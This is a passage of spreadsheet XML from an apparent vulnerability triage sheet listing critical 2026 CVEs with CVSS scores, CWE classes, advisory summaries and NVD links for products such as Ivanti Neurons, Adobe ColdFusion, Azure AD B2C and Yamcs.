      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60004</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.868</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>go:gitea.dev</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>1.27.1</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44756</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>A memory safety vulnerability exists in the Extended Passport Protocol (EPP) processing library. Under specific conditions, an unauthenticated attacker could exploit a crafted network request containing a malformed EPP header, potentially resulting in undefined behavior and abnormal program termination. Successful exploitation may have a high impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62815</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.Native.Quic.MsQuic.OpenSSL, nuget:Microsoft.Native.Quic.MsQuic.Schannel</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>2.4.19, 2.5.10</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R10"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S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70352</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Azure AI Language allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70352</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77995</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - miniorange.com - Arbitrary account takeover in miniOrange OAuth Client &lt; 3.2.0, OAuth Single Sign-On – OIDC SSO &lt; 1.2.2, Login with Keycloak OAuth Single Sign-On (SSO) &lt; 1.2.2, Single Sign-On for Educational Institutes &lt; 1.2.2 - The manipulation of a cookie value allows actors to login as arbitrary accounts, including admins.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77995</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77998</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77998</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80098</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>microsoft:copilot_studio</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Copilot Studio allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80098</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82004</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>adobe:campaign</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83711</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83711</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12645</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12646</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12647</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12650</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19232</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R22"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S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48273</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55565</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs LikeExpression.fillCode_getValueReturn in yamcs-core/src/main/java/org/yamcs/yarch/streamsql/LikeExpression.java inserts an unescaped LIKE pattern into Java source compiled by Expression.getCompiledExpression through SimpleCompiler.cook instead of applying ValueExpression.escapeJavaString. The pattern can originate from POST /api/archive/{instance}:executeSql, POST /api/archive/{instance}:streamSql, POST /api/archive/{instance}/tables/{table}:readRows, GET /api/archive/{instance}/events, or activity searches, including paths available with ReadTables, ReadEvents, or ReadActivities. A quote in the pattern can inject Java that runs as the Yamcs server process. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55565</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65818</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr">
        <is>
          <t>microsoft:power_platform</t>
        </is>
      </c>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
